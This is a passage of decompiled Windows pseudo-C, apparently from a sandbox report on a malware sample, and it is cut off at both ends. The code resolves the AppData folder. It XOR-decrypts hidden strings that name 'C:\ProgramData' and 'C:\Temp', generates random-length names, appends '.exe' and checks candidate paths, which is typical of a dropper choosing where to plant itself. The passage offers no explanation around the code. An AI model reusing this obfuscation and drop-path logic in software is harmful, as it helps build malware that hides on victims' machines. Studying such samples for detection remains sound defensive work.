											_v412 = 0;
											_v408 = 0xf;
											_v428 = 0;
											__eflags = _t1548 - 0x10;
											if(_t1548 < 0x10) {
												L252:
												_t1711 = _t1710 - 0x18;
												_v304 = _t1711;
												E0040BB10(_t1306, _t1711, _t1548, _t1681,  &_v372);
												_t1712 = _t1711 - 0x18;
												_v16 = 0x1f;
												_t1332 = _t1712;
												E0040BB10(_t1306, _t1332, _t1548, _t1681,  &_v396);
												_v16 = 0x17;
												_t831 = E00406800(_t1306, _t1332, _t1681, _t1686);
												_t1713 = _t1712 + 0x30;
												__eflags = _t831;
												if(_t831 == 0) {
													_t832 =  *0x450d74; // 0x0
													_v308 = 0x7a72146d;
													_v304 = 0x2e5e434b;
													__eflags = _t832 -  *((intOrPtr*)(_t1681 + 4));
													if(_t832 >  *((intOrPtr*)(_t1681 + 4))) {
														E0040EEC8(_t832, 0x450d74);
														_t1713 = _t1713 + 4;
														__eflags =  *0x450d74 - 0xffffffff;
														if(__eflags == 0) {
															 *0x450d58 = _v308;
															 *0x450d5c = _v304;
															E0040F1DA(_v304, __eflags, 0x42cf50);
															E0040EE7E(0x450d74);
															_t1713 = _t1713 + 8;
														}
													}
													_t833 =  *0x450d5f; // 0x0
													__eflags = _t833;
													if(_t833 != 0) {
														 *0x450d58 =  *0x450d58 ^ 0x0000002e;
														 *0x450d59 =  *0x450d59 ^ 0x0000002e;
														 *0x450d5a =  *0x450d5a ^ 0x0000002e;
														 *0x450d5b =  *0x450d5b ^ 0x0000002e;
														 *0x450d5c =  *0x450d5c ^ 0x0000002e;
														 *0x450d5d =  *0x450d5d ^ 0x0000002e;
														 *0x450d5e =  *0x450d5e ^ 0x0000002e;
														_t977 = _t833 ^ 0x0000002e;
														__eflags = _t977;
														 *0x450d5f = _t977;
													}
													_t1333 = 0x450d58;
													_v452 = 0;
													_v436 = 0;
													_v432 = 0xf;
													_v452 = 0;
													_t610 =  &(_t1333[1]); // 0x450d59
													_t1549 = _t610;
													do {
														_t834 =  *_t1333;
														_t1333 =  &(_t1333[1]);
														__eflags = _t834;
													} while (_t834 != 0);
													E004026C0(_t1306,  &_v452, 0x450d58, _t1333 - _t1549);
													_v16 = 0x22;
													_t1550 = _v432;
													_t1336 = _v436;
													__eflags = _t1550 - _t1336 - 1;
													if(_t1550 - _t1336 < 1) {
														_v400 = 0;
														_t838 = E00402990(_t1306,  &_v452, _t1681, _t1686, 1, _v400, "\\", 1);
													} else {
														_t615 =  &(1[_t1336]); // 0x1
														__eflags = _t1550 - 0x10;
														_v436 = _t615;
														_t976 =  >=  ? _v452 :  &_v452;
														 *((short*)(( >=  ? _v452 :  &_v452) + _t1336)) = 0x5c;
														_t838 =  &_v452;
													}
													_v428 = 0;
													_v412 = 0;
													_v408 = 0;
													asm("movups xmm0, [eax]");
													asm("movups [ebp-0x1a0], xmm0");
													asm("movq xmm0, [eax+0x10]");
													asm("movq [ebp-0x190], xmm0");
													 *(_t838 + 0x10) = 0;
													 *(_t838 + 0x14) = 0xf;
													 *_t838 = 0;
													_v16 = 0x23;
													_t840 = E0040C910( &_v476,  &_v428,  &_v348);
													_t1714 = _t1713 + 4;
													E004024A0(_t1306,  &_v396, _t840);
													_t1552 = _v456;
													__eflags = _t1552 - 0x10;
													if(_t1552 < 0x10) {
														L289:
														_v16 = 0x22;
														_t1553 = _v408;
														_v460 = 0;
														_v456 = 0xf;
														_v476 = 0;
														__eflags = _t1553 - 0x10;
														if(_t1553 < 0x10) {
															L293:
															_v16 = 0x17;
															_t1554 = _v432;
															_v412 = 0;
															_v408 = 0xf;
															_v428 = 0;
															__eflags = _t1554 - 0x10;
															if(_t1554 < 0x10) {
																L297:
																_t1715 = _t1714 - 0x18;
																_v304 = _t1715;
																E0040BB10(_t1306, _t1715, _t1554, _t1681,  &_v372);
																_t1716 = _t1715 - 0x18;
																_v16 = 0x24;
																_t1341 = _t1716;
																E0040BB10(_t1306, _t1341, _t1554, _t1681,  &_v396);
																_v16 = 0x17;
																_t846 = E00406800(_t1306, _t1341, _t1681, _t1686);
																_t1717 = _t1716 + 0x30;
																__eflags = _t846;
																if(_t846 == 0) {
																	E00402450(_t1306,  &_v372);
																	_v16 = 0;
																	E00402450(_t1306,  &_v348);
																	goto L309;
																} else {
																	_push(_t1341);
																	_t853 = E0040C6F0( &_v428,  &_v396);
																	_v16 = 0x25;
																	_t854 = E0040C910( &_v476, _t853,  &_v372);
																	_t1714 = _t1717 + 8;
																	_t1353 = _t854;
																	_v16 = 0x26;
																	_t1681 =  *(_t1353 + 0x14);
																	_t1557 =  *(_t1353 + 0x10);
																	__eflags = _t1681 - _t1557 - 4;
																	if(_t1681 - _t1557 < 4) {
																		_v400 = 0;
																		_t1353 = E00402990(_t1306, _t1353, _t1681, _t1686, 4, _v400, ".exe", 4);
																	} else {
																		 *(_t1353 + 0x10) = _t1557 + 4;
																		_t961 = _t1353;
																		__eflags = _t1681 - 0x10;
																		if(_t1681 >= 0x10) {
																			_t961 =  *_t1353;
																		}
																		 *((intOrPtr*)(_t961 + _t1557)) = 0x6578652e;
																		 *((char*)(_t961 + _t1557 + 4)) = 0;
																	}
																	 *_t1686 = 0;
																	 *(_t1686 + 0x10) = 0;
																	 *(_t1686 + 0x14) = 0;
																	asm("movups xmm0, [ecx]");
																	asm("movups [esi], xmm0");
																	asm("movq xmm0, [ecx+0x10]");
																	asm("movq [esi+0x10], xmm0");
																	 *(_t1353 + 0x10) = 0;
																	 *(_t1353 + 0x14) = 0xf;
																	 *_t1353 = 0;
																	_t1554 = _v456;
																	__eflags = _t1554 - 0x10;
																	if(_t1554 < 0x10) {
																		L307:
																		_v460 = 0;
																		_v456 = 0xf;
																		_v476 = 0;
																		E00402450(_t1306,  &_v428);
																		E00402450(_t1306,  &_v372);
																		E00402450(_t1306,  &_v348);
																		goto L310;
																	} else {
																		_t1357 = _v476;
																		_t1554 =  &(1[_t1554]);
																		_t861 = _t1357;
																		__eflags = _t1554 - 0x1000;
																		if(_t1554 < 0x1000) {
																			L306:
																			_push(_t1554);
																			E0040ED7F(_t1357);
																			goto L307;
																		} else {
																			_t1357 =  *((intOrPtr*)(_t1357 - 4));
																			_t1554 = _t1554 + 0x23;
																			__eflags = _t861 - _t1357 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L306;
																			}
																		}
																	}
																}
															} else {
																_t1424 = _v452;
																_t1554 =  &(1[_t1554]);
																_t962 = _t1424;
																__eflags = _t1554 - 0x1000;
																if(_t1554 < 0x1000) {
																	L296:
																	_push(_t1554);
																	E0040ED7F(_t1424);
																	_t1714 = _t1714 + 8;
																	goto L297;
																} else {
																	_t1357 =  *((intOrPtr*)(_t1424 - 4));
																	_t1554 = _t1554 + 0x23;
																	__eflags = _t962 -  *((intOrPtr*)(_t1424 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L296;
																	}
																}
															}
														} else {
															_t1425 = _v428;
															_t1576 = _t1553 + 1;
															_t966 = _t1425;
															__eflags = _t1576 - 0x1000;
															if(_t1576 < 0x1000) {
																L292:
																_push(_t1576);
																E0040ED7F(_t1425);
																_t1714 = _t1714 + 8;
																goto L293;
															} else {
																_t1357 =  *((intOrPtr*)(_t1425 - 4));
																_t1554 = _t1576 + 0x23;
																__eflags = _t966 -  *((intOrPtr*)(_t1425 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L292;
																}
															}
														}
													} else {
														_t1426 = _v476;
														_t1577 = _t1552 + 1;
														_t970 = _t1426;
														__eflags = _t1577 - 0x1000;
														if(_t1577 < 0x1000) {
															L288:
															_push(_t1577);
															E0040ED7F(_t1426);
															_t1714 = _t1714 + 8;
															goto L289;
														} else {
															_t1357 =  *((intOrPtr*)(_t1426 - 4));
															_t1554 = _t1577 + 0x23;
															__eflags = _t970 -  *((intOrPtr*)(_t1426 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L288;
															}
														}
													}
												} else {
													_push(_t1332);
													_t982 = E0040C6F0( &_v428,  &_v396);
													_v16 = 0x20;
													_t983 = E0040C910( &_v476, _t982,  &_v372);
													_t1714 = _t1713 + 8;
													_t1431 = _t983;
													_v16 = 0x21;
													_t1681 =  *(_t1431 + 0x14);
													_t1580 =  *(_t1431 + 0x10);
													__eflags = _t1681 - _t1580 - 4;
													if(_t1681 - _t1580 < 4) {
														_v400 = 0;
														_t1431 = E00402990(_t1306, _t1431, _t1681, _t1686, 4, _v400, ".exe", 4);
													} else {
														 *(_t1431 + 0x10) = _t1580 + 4;
														_t1008 = _t1431;
														__eflags = _t1681 - 0x10;
														if(_t1681 >= 0x10) {
															_t1008 =  *_t1431;
														}
														 *((intOrPtr*)(_t1008 + _t1580)) = 0x6578652e;
														 *((char*)(_t1008 + _t1580 + 4)) = 0;
													}
													 *_t1686 = 0;
													 *(_t1686 + 0x10) = 0;
													 *(_t1686 + 0x14) = 0;
													asm("movups xmm0, [ecx]");
													asm("movups [esi], xmm0");
													asm("movq xmm0, [ecx+0x10]");
													asm("movq [esi+0x10], xmm0");
													 *(_t1431 + 0x10) = 0;
													 *(_t1431 + 0x14) = 0xf;
													 *_t1431 = 0;
													_t1581 = _v456;
													__eflags = _t1581 - 0x10;
													if(_t1581 < 0x10) {
														L262:
														_t1582 = _v408;
														_v460 = 0;
														_v456 = 0xf;
														_v476 = 0;
														__eflags = _t1582 - 0x10;
														if(_t1582 < 0x10) {
															L266:
															_t1583 = _v352;
															_v412 = 0;
															_v408 = 0xf;
															_v428 = 0;
															__eflags = _t1583 - 0x10;
															if(_t1583 < 0x10) {
																L270:
																_t1584 = _v328;
																_v356 = 0;
																_v352 = 0xf;
																_v372 = 0;
																__eflags = _t1584 - 0x10;
																if(__eflags < 0) {
																	goto L228;
																} else {
																	_t1433 = _v348;
																	_t1585 = _t1584 + 1;
																	_t991 = _t1433;
																	__eflags = _t1585 - 0x1000;
																	if(__eflags < 0) {
																		L273:
																		_push(_t1585);
																		E0040ED7F(_t1433);
																		_t1714 = _t1714 + 8;
																		_v332 = 0;
																		_v328 = 0xf;
																		_v348 = 0;
																		goto L39;
																	} else {
																		_t1357 =  *((intOrPtr*)(_t1433 - 4));
																		_t1554 = _t1585 + 0x23;
																		__eflags = _t991 -  *((intOrPtr*)(_t1433 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L273;
																		}
																	}
																}
															} else {
																_t1434 = _v372;
																_t1586 = _t1583 + 1;
																_t995 = _t1434;
																__eflags = _t1586 - 0x1000;
																if(_t1586 < 0x1000) {
																	L269:
																	_push(_t1586);
																	E0040ED7F(_t1434);
																	_t1714 = _t1714 + 8;
																	goto L270;
																} else {
																	_t1357 =  *((intOrPtr*)(_t1434 - 4));
																	_t1554 = _t1586 + 0x23;
																	__eflags = _t995 -  *((intOrPtr*)(_t1434 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L269;
																	}
																}
															}
														} else {
															_t1435 = _v428;
															_t1587 = _t1582 + 1;
															_t999 = _t1435;
															__eflags = _t1587 - 0x1000;
															if(_t1587 < 0x1000) {
																L265:
																_push(_t1587);
																E0040ED7F(_t1435);
																_t1714 = _t1714 + 8;
																goto L266;
															} else {
																_t1357 =  *((intOrPtr*)(_t1435 - 4));
																_t1554 = _t1587 + 0x23;
																__eflags = _t999 -  *((intOrPtr*)(_t1435 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L265;
																}
															}
														}
													} else {
														_t1436 = _v476;
														_t1588 = _t1581 + 1;
														_t1003 = _t1436;
														__eflags = _t1588 - 0x1000;
														if(_t1588 < 0x1000) {
															L261:
															_push(_t1588);
															E0040ED7F(_t1436);
															_t1714 = _t1714 + 8;
															goto L262;
														} else {
															_t1357 =  *((intOrPtr*)(_t1436 - 4));
															_t1554 = _t1588 + 0x23;
															__eflags = _t1003 -  *((intOrPtr*)(_t1436 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L261;
															}
														}
													}
												}
											} else {
												_t1437 = _v452;
												_t1548 = _t1548 + 1;
												_t1009 = _t1437;
												__eflags = _t1548 - 0x1000;
												if(_t1548 < 0x1000) {
													L251:
													_push(_t1548);
													E0040ED7F(_t1437);
													_t1710 = _t1710 + 8;
													goto L252;
												} else {
													_t1357 =  *((intOrPtr*)(_t1437 - 4));
													_t1554 = _t1548 + 0x23;
													__eflags = _t1009 -  *((intOrPtr*)(_t1437 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L313;
													} else {
														goto L251;
													}
												}
											}
										} else {
											_t1438 = _v428;
											_t1589 = _t1547 + 1;
											_t1013 = _t1438;
											__eflags = _t1589 - 0x1000;
											if(_t1589 < 0x1000) {
												L247:
												_push(_t1589);
												E0040ED7F(_t1438);
												_t1710 = _t1710 + 8;
												goto L248;
											} else {
												_t1357 =  *((intOrPtr*)(_t1438 - 4));
												_t1554 = _t1589 + 0x23;
												__eflags = _t1013 -  *((intOrPtr*)(_t1438 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L313;
												} else {
													goto L247;
												}
											}
										}
									} else {
										_t1439 = _v476;
										_t1590 = _t1546 + 1;
										_t1017 = _t1439;
										__eflags = _t1590 - 0x1000;
										if(_t1590 < 0x1000) {
											L243:
											_push(_t1590);
											E0040ED7F(_t1439);
											_t1710 = _t1710 + 8;
											goto L244;
										} else {
											_t1357 =  *((intOrPtr*)(_t1439 - 4));
											_t1554 = _t1590 + 0x23;
											__eflags = _t1017 -  *((intOrPtr*)(_t1439 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L313;
											} else {
												goto L243;
											}
										}
									}
								} else {
									_push(_t1323);
									_t1031 = E0040C6F0( &_v428,  &_v396);
									_v16 = 0x1b;
									_t1032 = E0040C910( &_v476, _t1031,  &_v372);
									_t1714 = _t1709 + 8;
									_t1443 = _t1032;
									_v16 = 0x1c;
									_t1681 =  *(_t1443 + 0x14);
									_t1593 =  *(_t1443 + 0x10);
									__eflags = _t1681 - _t1593 - 4;
									if(_t1681 - _t1593 < 4) {
										_v400 = 0;
										_t1443 = E00402990(_t1306, _t1443, _t1681, _t1686, 4, _v400, ".exe", 4);
									} else {
										 *(_t1443 + 0x10) = _t1593 + 4;
										_t1053 = _t1443;
										__eflags = _t1681 - 0x10;
										if(_t1681 >= 0x10) {
											_t1053 =  *_t1443;
										}
										 *((intOrPtr*)(_t1053 + _t1593)) = 0x6578652e;
										 *((char*)(_t1053 + _t1593 + 4)) = 0;
									}
									 *_t1686 = 0;
									 *(_t1686 + 0x10) = 0;
									 *(_t1686 + 0x14) = 0;
									asm("movups xmm0, [ecx]");
									asm("movups [esi], xmm0");
									asm("movq xmm0, [ecx+0x10]");
									asm("movq [esi+0x10], xmm0");
									 *(_t1443 + 0x10) = 0;
									 *(_t1443 + 0x14) = 0xf;
									 *_t1443 = 0;
									_t1594 = _v456;
									__eflags = _t1594 - 0x10;
									if(_t1594 < 0x10) {
										L216:
										_t1595 = _v408;
										_v460 = 0;
										_v456 = 0xf;
										_v476 = 0;
										__eflags = _t1595 - 0x10;
										if(_t1595 < 0x10) {
											L220:
											_t1596 = _v352;
											_v412 = 0;
											_v408 = 0xf;
											_v428 = 0;
											__eflags = _t1596 - 0x10;
											if(_t1596 < 0x10) {
												L224:
												_t1597 = _v328;
												_v356 = 0;
												_v352 = 0xf;
												_v372 = 0;
												__eflags = _t1597 - 0x10;
												if(__eflags < 0) {
													L228:
													_v332 = 0;
													_v328 = 0xf;
													_v348 = 0;
													goto L39;
												} else {
													_t1444 = _v348;
													_t1598 = _t1597 + 1;
													_t1036 = _t1444;
													__eflags = _t1598 - 0x1000;
													if(__eflags < 0) {
														L227:
														_push(_t1598);
														E0040ED7F(_t1444);
														_t1714 = _t1714 + 8;
														goto L228;
													} else {
														_t1357 =  *((intOrPtr*)(_t1444 - 4));
														_t1554 = _t1598 + 0x23;
														__eflags = _t1036 -  *((intOrPtr*)(_t1444 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L227;
														}
													}
												}
											} else {
												_t1445 = _v372;
												_t1599 = _t1596 + 1;
												_t1040 = _t1445;
												__eflags = _t1599 - 0x1000;
												if(_t1599 < 0x1000) {
													L223:
													_push(_t1599);
													E0040ED7F(_t1445);
													_t1714 = _t1714 + 8;
													goto L224;
												} else {
													_t1357 =  *((intOrPtr*)(_t1445 - 4));
													_t1554 = _t1599 + 0x23;
													__eflags = _t1040 -  *((intOrPtr*)(_t1445 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L313;
													} else {
														goto L223;
													}
												}
											}
										} else {
											_t1446 = _v428;
											_t1600 = _t1595 + 1;
											_t1044 = _t1446;
											__eflags = _t1600 - 0x1000;
											if(_t1600 < 0x1000) {
												L219:
												_push(_t1600);
												E0040ED7F(_t1446);
												_t1714 = _t1714 + 8;
												goto L220;
											} else {
												_t1357 =  *((intOrPtr*)(_t1446 - 4));
												_t1554 = _t1600 + 0x23;
												__eflags = _t1044 -  *((intOrPtr*)(_t1446 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L313;
												} else {
													goto L219;
												}
											}
										}
									} else {
										_t1447 = _v476;
										_t1601 = _t1594 + 1;
										_t1048 = _t1447;
										__eflags = _t1601 - 0x1000;
										if(_t1601 < 0x1000) {
											L215:
											_push(_t1601);
											E0040ED7F(_t1447);
											_t1714 = _t1714 + 8;
											goto L216;
										} else {
											_t1357 =  *((intOrPtr*)(_t1447 - 4));
											_t1554 = _t1601 + 0x23;
											__eflags = _t1048 -  *((intOrPtr*)(_t1447 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L313;
											} else {
												goto L215;
											}
										}
									}
								}
							} else {
								_t1448 = _v452;
								_t1542 = _t1542 + 1;
								_t1054 = _t1448;
								__eflags = _t1542 - 0x1000;
								if(_t1542 < 0x1000) {
									L205:
									_push(_t1542);
									E0040ED7F(_t1448);
									_t1706 = _t1706 + 8;
									goto L206;
								} else {
									_t1357 =  *((intOrPtr*)(_t1448 - 4));
									_t1554 = _t1542 + 0x23;
									__eflags = _t1054 -  *((intOrPtr*)(_t1448 - 4)) + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										goto L313;
									} else {
										goto L205;
									}
								}
							}
						} else {
							_t1449 = _v428;
							_t1602 = _t1541 + 1;
							_t1058 = _t1449;
							__eflags = _t1602 - 0x1000;
							if(_t1602 < 0x1000) {
								L201:
								_push(_t1602);
								E0040ED7F(_t1449);
								_t1706 = _t1706 + 8;
								goto L202;
							} else {
								_t1357 =  *((intOrPtr*)(_t1449 - 4));
								_t1554 = _t1602 + 0x23;
								__eflags = _t1058 -  *((intOrPtr*)(_t1449 - 4)) + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L313;
								} else {
									goto L201;
								}
							}
						}
					} else {
						_t1450 = _v476;
						_t1603 = _t1540 + 1;
						_t1062 = _t1450;
						__eflags = _t1603 - 0x1000;
						if(_t1603 < 0x1000) {
							L197:
							_push(_t1603);
							E0040ED7F(_t1450);
							_t1706 = _t1706 + 8;
							goto L198;
						} else {
							_t1357 =  *((intOrPtr*)(_t1450 - 4));
							_t1554 = _t1603 + 0x23;
							__eflags = _t1062 -  *((intOrPtr*)(_t1450 - 4)) + 0xfffffffc - 0x1f;
							if(__eflags > 0) {
								goto L313;
							} else {
								goto L197;
							}
						}
					}
				} else {
					_t1074 =  &_v300;
					__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t1074); // executed
					if(_t1074 < 0) {
						_t1604 = E00418AE5(_t1306, __edi, _t1686, __eflags, "APPDATA");
						_t1705 = _t1705 + 4;
						_t1451 = _t1604;
						_t16 = _t1451 + 1; // 0x1
						_t1681 = _t16;
						goto L6;
						L6:
						_t1076 =  *_t1451;
						_t1451 = _t1451 + 1;
						__eflags = _t1076;
						if(_t1076 != 0) {
							goto L6;
						} else {
							_t1452 = _t1451 - _t1681;
							__eflags = _t1452;
							_push(_t1452);
							_push(_t1604);
						}
					} else {
						_t1533 =  &_v300;
						_t1679 = _t1533 + 1;
						asm("o16 nop [eax+eax]");
						goto L3;
						L3:
						_t1303 =  *_t1533;
						_t1533 = _t1533 + 1;
						_t1767 = _t1303;
						if(_t1303 != 0) {
							goto L3;
						} else {
							_push(_t1533 - _t1679);
							_push( &_v300);
						}
					}
					E004026C0(_t1306,  &_v396);
					E00406760(_t1306,  &_v372, _t1681); // executed
					_v16 = 1;
					_t1079 = E00417D76( &_v372, _t1767);
					asm("cdq");
					_t1456 =  &_v348;
					E004055C0(_t1456, _t1079 % 0xa + 5);
					_push(_t1456);
					_v16 = 2;
					_t1082 = E0040C6F0( &_v476,  &_v396);
					_v16 = 3;
					_t1083 = E0040C910( &_v428, _t1082,  &_v372);
					_t1714 = _t1705 + 8;
					E004024A0(_t1306,  &_v396, _t1083);
					_t1609 = _v408;
					if(_t1609 < 0x10) {
						L12:
						_v16 = 2;
						_t1610 = _v456;
						_v412 = 0;
						_v408 = 0xf;
						_v428 = 0;
						if(_t1610 < 0x10) {
							L16:
							_t1745 = _t1714 - 0x18;
							_v400 = _t1745;
							E0040BB10(_t1306, _t1745, _t1610, _t1681,  &_v348);
							_t1746 = _t1745 - 0x18;
							_v16 = 4;
							_t1462 = _t1746;
							E0040BB10(_t1306, _t1462, _t1610, _t1681,  &_v396);
							_v16 = 2;
							_t1089 = E00406800(_t1306, _t1462, _t1681, _t1686); // executed
							_t1747 = _t1746 + 0x30;
							if(_t1089 == 0) {
								_v401 = 0x2e;
								_t1681 =  *( *[fs:0x2c]);
								_t1091 =  *0x450efc; // 0x0
								__eflags = _t1091 -  *((intOrPtr*)(_t1681 + 4));
								if(_t1091 >  *((intOrPtr*)(_t1681 + 4))) {
									E0040EEC8(_t1091, 0x450efc);
									_t1747 = _t1747 + 4;
									__eflags =  *0x450efc - 0xffffffff;
									if(__eflags == 0) {
										asm("movaps xmm0, [0x439d70]");
										asm("movups [0x450ea8], xmm0");
										 *0x450eb8 = _v401;
										E0040F1DA(_t1462, __eflags, 0x42d000);
										E0040EE7E(0x450efc);
										_t1747 = _t1747 + 8;
									}
								}
								_t1092 =  *0x450eb8; // 0x0
								__eflags = _t1092;
								if(_t1092 != 0) {
									asm("movups xmm0, [0x450ea8]");
									asm("movaps xmm1, [0x439d20]");
									asm("pxor xmm1, xmm0");
									 *0x450eb8 = _t1092 ^ 0x0000002e;
									asm("movups [0x450ea8], xmm1");
								}
								_t1463 = 0x450ea8;
								_v324 = 0;
								_v308 = 0;
								_v304 = 0xf;
								_v324 = 0;
								_t100 = _t1463 + 1; // 0x450ea9
								_t1611 = _t100;
								asm("o16 nop [eax+eax]");
								do {
									_t1093 =  *_t1463;
									_t1463 = _t1463 + 1;
									__eflags = _t1093;
								} while (_t1093 != 0);
								E004026C0(_t1306,  &_v324, 0x450ea8, _t1463 - _t1611);
								_v16 = 7;
								_t1612 = _v304;
								_t1466 = _v308;
								__eflags = _t1612 - _t1466 - 1;
								if(_t1612 - _t1466 < 1) {
									_v400 = 0;
									_t1097 = E00402990(_t1306,  &_v324, _t1681, _t1686, 1, _v400, "\\", 1);
								} else {
									_t105 =  &(1[_t1466]); // 0x1
									__eflags = _t1612 - 0x10;
									_v308 = _t105;
									_t1266 =  >=  ? _v324 :  &_v324;
									 *((short*)(( >=  ? _v324 :  &_v324) + _t1466)) = 0x5c;
									_t1097 =  &_v324;
								}
								_v452 = 0;
								_v436 = 0;
								_v432 = 0;
								asm("movups xmm0, [eax]");
								asm("movups [ebp-0x1b8], xmm0");
								asm("movq xmm0, [eax+0x10]");
								asm("movq [ebp-0x1a8], xmm0");
								 *(_t1097 + 0x10) = 0;
								 *(_t1097 + 0x14) = 0xf;
								 *_t1097 = 0;
								_v16 = 8;
								_t1099 = E0040C910( &_v428,  &_v452,  &_v372);
								_t1714 = _t1747 + 4;
								E004024A0(_t1306,  &_v396, _t1099);
								_t1614 = _v408;
								__eflags = _t1614 - 0x10;
								if(_t1614 < 0x10) {
									L57:
									_v16 = 7;
									_t1615 = _v432;
									_v412 = 0;
									_v408 = 0xf;
									_v428 = 0;
									__eflags = _t1615 - 0x10;
									if(_t1615 < 0x10) {
										L61:
										_v16 = 2;
										_t1616 = _v304;
										_v436 = 0;
										_v432 = 0xf;
										_v452 = 0;
										__eflags = _t1616 - 0x10;
										if(_t1616 < 0x10) {
											L65:
											_t1748 = _t1714 - 0x18;
											_v304 = _t1748;
											E0040BB10(_t1306, _t1748, _t1616, _t1681,  &_v348);
											_t1749 = _t1748 - 0x18;
											_v16 = 9;
											_t1471 = _t1749;
											E0040BB10(_t1306, _t1471, _t1616, _t1681,  &_v396);
											_v16 = 2;
											_t1105 = E00406800(_t1306, _t1471, _t1681, _t1686);
											_t1750 = _t1749 + 0x30;
											__eflags = _t1105;
											if(_t1105 == 0) {
												_t1106 =  *0x450e88; // 0x0
												_v316 = 0x7e72146d;
												_v312 = 0x5c49415c;
												_v308 = 0x4f6a434f;
												_v304 = 0x4f5a;
												_v401 = 0x2e;
												__eflags = _t1106 -  *((intOrPtr*)(_t1681 + 4));
												if(_t1106 >  *((intOrPtr*)(_t1681 + 4))) {
													E0040EEC8(_t1106, 0x450e88);
													_t1750 = _t1750 + 4;
													__eflags =  *0x450e88 - 0xffffffff;
													if(__eflags == 0) {
														asm("movq xmm0, [ebp-0x130]");
														 *0x451010 = _v308;
														 *0x451014 = _v304;
														asm("movq [0x451008], xmm0");
														 *0x451016 = _v401;
														E0040F1DA(_t1471, __eflags, 0x42cfc0);
														E0040EE7E(0x450e88);
														_t1750 = _t1750 + 8;
													}
												}
												__eflags =  *0x451016;
												if( *0x451016 != 0) {
													_t1223 = 0;
													__eflags = 0;
													do {
														 *(_t1223 + 0x451008) =  *(_t1223 + 0x451008) ^ 0x0000002e;
														_t1223 = _t1223 + 1;
														__eflags = _t1223 - 0xf;
													} while (_t1223 < 0xf);
												}
												_t1472 = 0x451008;
												_v452 = 0;
												_v436 = 0;
												_v432 = 0xf;
												_v452 = 0;
												_t201 = _t1472 + 1; // 0x451009
												_t1617 = _t201;
												do {
													_t1107 =  *_t1472;
													_t1472 = _t1472 + 1;
													__eflags = _t1107;
												} while (_t1107 != 0);
												E004026C0(_t1306,  &_v452, 0x451008, _t1472 - _t1617);
												_v16 = 0xc;
												_t1618 = _v432;
												_t1475 = _v436;
												__eflags = _t1618 - _t1475 - 1;
												if(_t1618 - _t1475 < 1) {
													_v400 = 0;
													_t1111 = E00402990(_t1306,  &_v452, _t1681, _t1686, 1, _v400, "\\", 1);
												} else {
													_t206 =  &(1[_t1475]); // 0x1
													__eflags = _t1618 - 0x10;
													_v436 = _t206;
													_t1222 =  >=  ? _v452 :  &_v452;
													 *((short*)(( >=  ? _v452 :  &_v452) + _t1475)) = 0x5c;
													_t1111 =  &_v452;
												}
												_v428 = 0;
												_v412 = 0;
												_v408 = 0;
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x1a0], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x190], xmm0");
												 *(_t1111 + 0x10) = 0;
												 *(_t1111 + 0x14) = 0xf;
												 *_t1111 = 0;
												_v16 = 0xd;
												_t1113 = E0040C910( &_v476,  &_v428,  &_v372);
												_t1714 = _t1750 + 4;
												E004024A0(_t1306,  &_v396, _t1113);
												_t1620 = _v456;
												__eflags = _t1620 - 0x10;
												if(_t1620 < 0x10) {
													L102:
													_v16 = 0xc;
													_t1621 = _v408;
													_v460 = 0;
													_v456 = 0xf;
													_v476 = 0;
													__eflags = _t1621 - 0x10;
													if(_t1621 < 0x10) {
														L106:
														_v16 = 2;
														_t1622 = _v432;
														_v412 = 0;
														_v408 = 0xf;
														_v428 = 0;
														__eflags = _t1622 - 0x10;
														if(_t1622 < 0x10) {
															L110:
															_t1751 = _t1714 - 0x18;
															_v304 = _t1751;
															E0040BB10(_t1306, _t1751, _t1622, _t1681,  &_v348);
															_t1752 = _t1751 - 0x18;
															_v16 = 0xe;
															_t1480 = _t1752;
															E0040BB10(_t1306, _t1480, _t1622, _t1681,  &_v396);
															_v16 = 2;
															_t1119 = E00406800(_t1306, _t1480, _t1681, _t1686);
															_t1753 = _t1752 + 0x30;
															__eflags = _t1119;
															if(_t1119 == 0) {
																_t1120 =  *0x450f14; // 0x0
																_v308 = 0x7a72146d;
																_v304 = 0x2e5e434b;
																__eflags = _t1120 -  *((intOrPtr*)(_t1681 + 4));
																if(_t1120 >  *((intOrPtr*)(_t1681 + 4))) {
																	E0040EEC8(_t1120, 0x450f14);
																	_t1753 = _t1753 + 4;
																	__eflags =  *0x450f14 - 0xffffffff;
																	if(__eflags == 0) {
																		 *0x450f38 = _v308;
																		 *0x450f3c = _v304;
																		E0040F1DA(_v304, __eflags, 0x42cfb0);
																		E0040EE7E(0x450f14);
																		_t1753 = _t1753 + 8;
																	}
																}
																_t1121 =  *0x450f3f; // 0x0
																__eflags = _t1121;
																if(_t1121 != 0) {
																	 *0x450f38 =  *0x450f38 ^ 0x0000002e;
																	 *0x450f39 =  *0x450f39 ^ 0x0000002e;
																	 *0x450f3a =  *0x450f3a ^ 0x0000002e;
																	 *0x450f3b =  *0x450f3b ^ 0x0000002e;
																	 *0x450f3c =  *0x450f3c ^ 0x0000002e;
																	 *0x450f3d =  *0x450f3d ^ 0x0000002e;
																	 *0x450f3e =  *0x450f3e ^ 0x0000002e;
